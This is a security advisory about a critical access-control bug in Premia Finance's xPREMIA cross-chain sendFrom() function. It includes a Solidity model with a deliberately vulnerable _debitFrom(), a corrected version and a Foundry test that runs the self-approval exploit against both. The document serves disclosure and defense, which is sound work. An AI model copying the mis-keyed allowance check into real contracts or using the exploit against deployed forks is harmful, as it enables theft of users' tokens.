Full Report
The author commonly browses through DeFiLlama looking for new things to audit. If a protocol has a TVL of 5M and a bug bounty program, they take a quick look for low-hanging fruit, and that low-hanging fruit is the focus of the article.

In DeFi it is common for the code of a popular project, such as Aave or Uniswap, to be forked over and over again with small changes. Once you know how these codebases work, non-standard functions and modifications to the underlying protocol become great targets.

In Premia's staked token contract, the function sendFrom() appeared to be custom. It allowed a user to transfer funds on behalf of another user: essentially a transferFrom() for cross-chain calls. The function took in a from address, but that address was only used for the debit itself, NOT for the verification. Instead, the allowance check was keyed on the sender twice: once the abstraction is stripped away, it read allowances[msg.sender][msg.sender]. So by approving yourself, you could steal tokens from any other user. Yikes!

The bug is obvious, but the efficiency of finding it is what is interesting. If you already know and have audited the ten most common codebases, you can make quick work of a fork. Overall, a simple bug that led to a large payout.
Analysis Summary
# Vulnerability: Staked Premia (xPREMIA) Improper Access Control in Cross-Chain Transfer
## CVE Details
- **CVE ID**: Not Assigned (DeFi/Smart Contract vulnerability)
- **CVSS Score**: 9.1 (Critical)
- **CWE**: CWE-285: Improper Authorization (Broken Access Control)
## Affected Systems
- **Products**: Premia Finance (DeFi Options Protocol)
- **Versions**: xPREMIA (Staked Premia Token) contract prior to July 31, 2023.
- **Configurations**: The vulnerability specifically resided in the `sendFrom()` function, an implementation of the Omnichain Fungible Token (OFT) standard used for cross-chain calls.
## Vulnerability Description
The vulnerability was a critical logic error in the `_debitFrom()` internal function, which was called by the public `sendFrom()` function. In standard `transferFrom` logic, a caller (`msg.sender`) must have an allowance granted by the owner (`from`).
However, the vulnerable code implemented the allowance check incorrectly:
1. It used `msg.sender` as the key for the allowance mapping twice: `allowances[msg.sender][msg.sender]`.
2. This meant the contract checked if the caller had authorized **themselves** to spend their own tokens, rather than checking if the **owner** (`from`) had authorized the caller.
3. By calling `approve(msg.sender, amount)` on their own account, an attacker could satisfy the allowance check and then specify *any* third-party address as the `from` parameter, burning that address's tokens on the source chain; in the OFT flow the burned amount is then minted at the attacker-chosen destination address on the other chain.
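As an added example (not Premia's or Zellic's code, and not LayerZero's OFT implementation), the following Solidity model reduces an OFT-style token to the `sendFrom()` / `_debitFrom()` path, shows the mis-keyed allowance check beside the corrected one, and includes a Foundry test that performs the self-approval exploit against both. Contract and function names, the simplified `sendFrom()` signature (the real OFT entry point takes more arguments), the constructor that seeds a balance, and the victim/attacker addresses are all assumptions made for the demonstration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "forge-std/Test.sol"; // assumes a Foundry project with forge-std installed

// Minimal stand-in for an OFT-style token, reduced to the parts that matter for
// the bug: ERC-20 style balances/allowances, a burn, and a sendFrom() entry point.
// Names and signatures here are simplified, not Premia's or LayerZero's code.
abstract contract MinimalOFT {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    event Transfer(address indexed from, address indexed to, uint256 amount);
    event Approval(address indexed owner, address indexed spender, uint256 amount);

    constructor(address holder, uint256 amount) {
        balanceOf[holder] = amount; // seed one balance for the demonstration
    }

    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    // Cross-chain send: burn on this chain, then the messaging layer mints the
    // same amount on dstChainId (the bridging call is omitted in this model).
    function sendFrom(address from, uint16 dstChainId, bytes calldata toAddress, uint256 amount) external payable {
        _debitFrom(from, dstChainId, toAddress, amount);
    }

    function _debitFrom(address from, uint16 dstChainId, bytes calldata toAddress, uint256 amount) internal virtual;

    function _burn(address from, uint256 amount) internal {
        require(balanceOf[from] >= amount, "insufficient balance");
        balanceOf[from] -= amount;
        emit Transfer(from, address(0), amount);
    }
}

// VULNERABLE: msg.sender is used as both keys of the allowance mapping, so the
// owner passed as `from` is never consulted. `from` is still consumed by _burn,
// which is why an unused-parameter warning would not have caught this.
contract VulnerableOFT is MinimalOFT {
    constructor(address holder, uint256 amount) MinimalOFT(holder, amount) {}

    function _debitFrom(address from, uint16, bytes calldata, uint256 amount) internal override {
        address spender = msg.sender;
        uint256 allowed = allowance[spender][spender]; // BUG: should be allowance[from][spender]
        require(allowed >= amount, "insufficient allowance");
        allowance[spender][spender] = allowed - amount;
        _burn(from, amount);
    }
}

// FIXED: check and spend the owner's allowance for the caller; an owner moving
// their own tokens needs no allowance (the standard OFT shape).
contract FixedOFT is MinimalOFT {
    constructor(address holder, uint256 amount) MinimalOFT(holder, amount) {}

    function _debitFrom(address from, uint16, bytes calldata, uint256 amount) internal override {
        address spender = msg.sender;
        if (from != spender) {
            uint256 allowed = allowance[from][spender];
            require(allowed >= amount, "insufficient allowance");
            allowance[from][spender] = allowed - amount;
        }
        _burn(from, amount);
    }
}

// Foundry test: the attacker approves themselves, then names the victim as `from`.
contract DebitFromTest is Test {
    address constant VICTIM = address(0xBEEF);
    address constant ATTACKER = address(0xBAD);
    uint256 constant STAKE = 1_000 ether;

    function testSelfApprovalDrainsVictimOnVulnerable() public {
        VulnerableOFT token = new VulnerableOFT(VICTIM, STAKE);
        vm.startPrank(ATTACKER);
        token.approve(ATTACKER, STAKE); // satisfies allowance[ATTACKER][ATTACKER]
        token.sendFrom(VICTIM, 1, abi.encodePacked(ATTACKER), STAKE);
        vm.stopPrank();
        assertEq(token.balanceOf(VICTIM), 0); // victim's stake burned without consent
    }

    function testSelfApprovalRevertsOnFixed() public {
        FixedOFT token = new FixedOFT(VICTIM, STAKE);
        vm.startPrank(ATTACKER);
        token.approve(ATTACKER, STAKE);
        vm.expectRevert("insufficient allowance");
        token.sendFrom(VICTIM, 1, abi.encodePacked(ATTACKER), STAKE);
        vm.stopPrank();
        assertEq(token.balanceOf(VICTIM), STAKE);
    }
}
```

Run with `forge test` from a Foundry project. The second test is the regression check a reviewer of any OFT fork should insist on: a caller who has only approved themselves must not be able to debit a third party's balance, whatever the `from` argument says.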
## Exploitation
- **Status**: PoC available (Independently discovered by Zellic; reported via bug bounty).
- **Complexity**: Low
- **Attack Vector**: Network (On-chain)
## Impact
- **Confidentiality**: Low
- **Integrity**: High (Unauthorized transfer/theft of tokens)
- **Availability**: High (Drainage of user staked balances)
- **Financial Impact**: Approximately $3,000,000 in TVL was at risk at the time of discovery.
## Remediation
### Patches
- The Premia Finance team addressed the bug on **July 31, 2023**, by updating the `_debitFrom` logic to correctly reference the `from` address in the allowance mapping: `allowances[from][spender]`.
### Workarounds
- There are no viable workarounds for the vulnerable contract; users were protected by the protocol-level patch and redeployment.
## Detection
- **Indicators of Compromise**: Unexpected `Transfer` or `Burn` events for xPREMIA tokens where the `from` address did not initiate the transaction and had not explicitly granted an allowance to the initiator.
- **Detection Methods**: Review forked protocols by diffing them against the upstream `OFT`/`OFTV2` contracts and scrutinising every modification, particularly in `_debitFrom` and other authorization paths. Generic unused-parameter warnings would not have flagged this bug: `from` was still consumed by the burn, so the defect is the wrong key in the allowance lookup rather than an ignored argument. A unit test asserting that a self-approved caller cannot debit a third party's balance catches it directly.
## References
- **Zellic Research Advisory**: hxxps://www.zellic.io/blog/browsing-for-bugs-3m-bug-in-premia-finance/
- **Premia Finance**: hxxps://premia.finance/
- **LayerZero OFT Standard**: hxxps://github.com/LayerZero-Labs/solidity-examples/tree/main/contracts/token/oft